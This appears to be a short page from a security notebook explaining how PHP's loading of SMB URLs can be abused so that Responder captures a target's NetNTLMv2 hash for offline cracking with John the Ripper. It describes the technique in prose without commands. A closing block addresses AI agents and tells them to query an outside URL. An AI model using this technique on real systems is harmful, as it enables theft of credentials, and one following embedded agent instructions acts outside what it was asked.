# Responder

### Exploit NTLM using Responder:

\
In the PHP configuration file **php.ini** , "<mark style="color:green;">allow\_url\_include</mark><mark style="color:orange;">"</mark> wrapper is set to "Off" by default, indicating that PHP does not load remote HTTP or FTP URLs to prevent remote file inclusion attacks.&#x20;

However, even if <mark style="color:green;">allow\_url\_include</mark> and <mark style="color:yellow;">allow\_url\_fopen</mark> are set to "Off", <mark style="color:red;">PHP will not prevent the loading of SMB URLs.</mark>&#x20;

In our case, we can misuse this functionality **to steal the NTLM hash**. Now, using the example from this link we can attempt to load a SMB URL, and in that process, we can capture the hashes from the target using Responder.

### How does Responder work?&#x20;

Responder can do many different kinds of attacks, but for this scenario, it will set up a malicious SMB server. When the target machine attempts to perform the NTLM authentication to that server, Responder sends a challenge back for the server to encrypt with the user's password. When the server responds, Responder will use the challenge and the encrypted response to generate the NetNTLMv2. While we can't reverse the NetNTLMv2, we can try many different common passwords to see if any generate the same challenge-response, and if we find one, we know that is the password. This is often referred to as hash cracking, which we'll do with a program called **John The Ripper.**<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://n0m4dsec.gitbook.io/sec-book/web-exploitation-tools/responder.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.